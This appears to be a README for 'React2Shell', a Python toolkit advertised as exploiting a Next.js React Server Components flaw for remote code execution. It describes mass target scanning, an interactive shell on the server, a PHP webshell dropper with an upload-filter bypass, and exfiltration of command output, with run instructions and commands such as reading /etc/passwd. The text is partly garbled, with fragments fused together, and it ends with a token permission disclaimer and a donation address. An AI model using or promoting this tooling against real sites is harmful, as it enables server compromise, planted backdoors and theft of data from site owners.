
React2Shell - CVE-2025-66478 RCE Exploit
This Python toolkit exploits Next.js React Server Components (RSC) prototype pollution + React.lazy(-1) gadget chain for full RCE access, including interactive god shell, file upload (PHP webshell dropper), and exfiltration via ?out=.

Automated detection & exploitation of vulnerable Next.js apps (e.g., target.com). Drops uid=33(www-data) shell with:
child_process.execSync → /exploit?out=UIDread /etc/passwd), uploads{\"0\":null} → 500 E{\"digest confirms RSC handler.Location: /exploit?out=id_outputexecSync(cmd) → exfil stdout/stderr via redirect.upload_txt local.txt remote.php → write+rename bypass.pip3 install aiohttppython3 main.pyhttp://target.com or targets.txt1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]Piped: echo \"http://target\n4\" | python3 main.py
God Shell Commands:
upload <local.php> <remote/shell.php> # Direct PHP upload
upload_txt <local> <remote/shell.php> # TXT→rename bypass
upload_bin <local> <remote> # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
For authorized penetration testing & educational purposes only (user confirmed permission under ToS). Unauthorized use illegal/unethical.
Buy me a Coffee:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans